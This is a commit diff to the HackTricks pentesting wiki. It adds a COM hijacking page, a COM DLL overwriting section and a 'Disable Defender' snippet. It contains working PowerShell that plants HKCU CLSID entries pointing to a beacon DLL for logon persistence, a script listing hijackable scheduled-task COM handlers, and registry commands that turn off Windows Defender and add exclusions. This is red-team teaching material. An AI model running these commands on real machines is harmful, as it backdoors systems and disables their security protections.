GitBook: [#3366] No subject
This commit is contained in:
parent
b60731d690
commit
9c920d3e26
Binary file not shown.
Before Width: | Height: | Size: 8.4 KiB After Width: | Height: | Size: 7.8 KiB |
Binary file not shown.
Before Width: | Height: | Size: 7.8 KiB After Width: | Height: | Size: 33 KiB |
|
@ -139,6 +139,7 @@
|
||||||
* [Access Tokens](windows-hardening/windows-local-privilege-escalation/access-tokens.md)
|
* [Access Tokens](windows-hardening/windows-local-privilege-escalation/access-tokens.md)
|
||||||
* [ACLs - DACLs/SACLs/ACEs](windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md)
|
* [ACLs - DACLs/SACLs/ACEs](windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md)
|
||||||
* [Dll Hijacking](windows-hardening/windows-local-privilege-escalation/dll-hijacking.md)
|
* [Dll Hijacking](windows-hardening/windows-local-privilege-escalation/dll-hijacking.md)
|
||||||
|
* [COM Hijacking](windows-hardening/windows-local-privilege-escalation/com-hijacking.md)
|
||||||
* [From High Integrity to SYSTEM with Name Pipes](windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md)
|
* [From High Integrity to SYSTEM with Name Pipes](windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md)
|
||||||
* [Integrity Levels](windows-hardening/windows-local-privilege-escalation/integrity-levels.md)
|
* [Integrity Levels](windows-hardening/windows-local-privilege-escalation/integrity-levels.md)
|
||||||
* [JAWS](windows-hardening/windows-local-privilege-escalation/jaws.md)
|
* [JAWS](windows-hardening/windows-local-privilege-escalation/jaws.md)
|
||||||
|
|
|
@ -16,7 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
![](<../.gitbook/assets/image (638).png>)
|
![](<../.gitbook/assets/image (638) (3).png>)
|
||||||
|
|
||||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||||
|
|
||||||
|
|
|
@ -176,14 +176,16 @@ Get-NetConnectionProfile |
|
||||||
}
|
}
|
||||||
```
|
```
|
||||||
|
|
||||||
## Antivirus
|
## Disable Defender
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
#Check status
|
# Check status
|
||||||
Get-MpComputerStatus
|
Get-MpComputerStatus
|
||||||
#Disable
|
# Disable
|
||||||
Set-MpPreference -DisableRealtimeMonitoring $true
|
Set-MpPreference -DisableRealtimeMonitoring $true
|
||||||
#Set exclusion path
|
#To completely disable Windows Defender on a computer, use the command:
|
||||||
|
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
|
||||||
|
# Set exclusion path
|
||||||
Add-MpPreference -ExclusionPath "C:\users\public\documents\magichk"
|
Add-MpPreference -ExclusionPath "C:\users\public\documents\magichk"
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
|
@ -1328,6 +1328,24 @@ Tools to extract passwords from browsers:
|
||||||
* Mimikatz: `dpapi::chrome`
|
* Mimikatz: `dpapi::chrome`
|
||||||
* [**SharpWeb**](https://github.com/djhohnstein/SharpWeb)
|
* [**SharpWeb**](https://github.com/djhohnstein/SharpWeb)
|
||||||
|
|
||||||
|
### **COM DLL Overwriting**
|
||||||
|
|
||||||
|
**Component Object Model (COM)** is a technology built within the Windows operating system that allows **intercommunication** between software components of different languages. **** Each COM component is **identified via a class ID (CLSID)** and each component exposes functionality via one or more interfaces, identified via interface IDs (IIDs).
|
||||||
|
|
||||||
|
COM classes and interfaces are defined in the registry under **HKEY\_**_**CLASSES\_**_**ROOT\CLSID** and **HKEY\_**_**CLASSES\_**_**ROOT\Interface** respectively. This registry is created by merging the **HKEY\_**_**LOCAL\_**_**MACHINE\Software\Classes** + **HKEY\_**_**CURRENT\_**_**USER\Software\Classes** = **HKEY\_**_**CLASSES\_**_**ROOT.**
|
||||||
|
|
||||||
|
Inside the CLSIDs of this registry you can find the child registry **InProcServer32** which contains a **default value** pointing to a **DLL** and a value called **ThreadingModel** that can be **Apartment** (Single-Threaded), **Free** (Multi-Threaded), **Both** (Single or Multi) or **Neutral** (Thread Neutral).
|
||||||
|
|
||||||
|
![](<../../.gitbook/assets/image (638).png>)
|
||||||
|
|
||||||
|
Basically, if you can **overwrite any of the DLLs** that are going to be executed, you could **escalate privileges** if that DLL is going to be executed by a different user.
|
||||||
|
|
||||||
|
To learn how attackers use COM Hijacking as a persistence mechanism check:
|
||||||
|
|
||||||
|
{% content-ref url="com-hijacking.md" %}
|
||||||
|
[com-hijacking.md](com-hijacking.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### **Generic Password search in files and registry**
|
### **Generic Password search in files and registry**
|
||||||
|
|
||||||
**Search for file contents**
|
**Search for file contents**
|
||||||
|
|
|
@ -0,0 +1,106 @@
|
||||||
|
# COM Hijacking
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||||
|
|
||||||
|
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
|
||||||
|
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
|
||||||
|
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
|
||||||
|
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
|
|
||||||
|
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
### Searching not existent COM components
|
||||||
|
|
||||||
|
As the values of HKCU can be modified by the users **COM Hijacking** could be used as a **persistent mechanisms**. Using `procmon` it's easy to find searched COM registries that doesn't exist that an attacker could create to persist. Filters:
|
||||||
|
|
||||||
|
* **RegOpenKey** operations.
|
||||||
|
* where the _Result_ is **NAME NOT FOUND**.
|
||||||
|
* and the _Path_ ends with **InprocServer32**.
|
||||||
|
|
||||||
|
Once you have decided which not existent COM to impersonate execute the following commands. _Be careful if you decide to impersonate a COM that is loaded every few seconds as that could be overkill._ 
|
||||||
|
|
||||||
|
```bash
|
||||||
|
New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
|
||||||
|
New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll"
|
||||||
|
New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"
|
||||||
|
```
|
||||||
|
|
||||||
|
### Hijackable Task Scheduler COM components
|
||||||
|
|
||||||
|
Windows Tasks actually use Custom Triggers to call COM objects. And because they're executed via the Task Scheduler, it's easier to predict when they're going to be triggered.
|
||||||
|
|
||||||
|
<pre class="language-powershell"><code class="lang-powershell"># Show COM CLSIDs
|
||||||
|
$Tasks = Get-ScheduledTask
|
||||||
|
|
||||||
|
foreach ($Task in $Tasks)
|
||||||
|
{
|
||||||
|
if ($Task.Actions.ClassId -ne $null)
|
||||||
|
{
|
||||||
|
if ($Task.Triggers.Enabled -eq $true)
|
||||||
|
{
|
||||||
|
if ($Task.Principal.GroupId -eq "Users")
|
||||||
|
{
|
||||||
|
Write-Host "Task Name: " $Task.TaskName
|
||||||
|
Write-Host "Task Path: " $Task.TaskPath
|
||||||
|
Write-Host "CLSID: " $Task.Actions.ClassId
|
||||||
|
Write-Host
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
# Sample Output:
|
||||||
|
<strong># Task Name: Example
|
||||||
|
</strong># Task Path: \Microsoft\Windows\Example\
|
||||||
|
# CLSID: {1936ED8A-BD93-3213-E325-F38D112938E1}
|
||||||
|
# [more like the previous one...]</code></pre>
|
||||||
|
|
||||||
|
Checking the output you can select one that is going to be executed **every time a user logs in** for example.
|
||||||
|
|
||||||
|
Now searching for the CLSID **{1936ED8A-BD93-3213-E325-F38D112938EF}** in **HKEY\_**_**CLASSES\_**_**ROOT\CLSID** and in HKLM and HKCU, you usually will find that the value doesn't exist in HKCU.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Exists in HKCR\CLSID\
|
||||||
|
Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}"
|
||||||
|
|
||||||
|
Name Property
|
||||||
|
---- --------
|
||||||
|
InprocServer32 (default) : C:\Windows\system32\some.dll
|
||||||
|
ThreadingModel : Both
|
||||||
|
|
||||||
|
# Exists in HKLM
|
||||||
|
Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize
|
||||||
|
|
||||||
|
Name Property
|
||||||
|
---- --------
|
||||||
|
{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} (default) : MsCtfMonitor task handler
|
||||||
|
|
||||||
|
# Doesn't exist in HKCU
|
||||||
|
PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
|
||||||
|
Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.
|
||||||
|
```
|
||||||
|
|
||||||
|
Then, you can just create the HKCU entry and everytime the user logs in, your backdoor will be fired.
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||||
|
|
||||||
|
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
|
||||||
|
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
|
||||||
|
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
|
||||||
|
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
|
|
||||||
|
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||||
|
|
||||||
|
</details>
|
Loading…
Reference in New Issue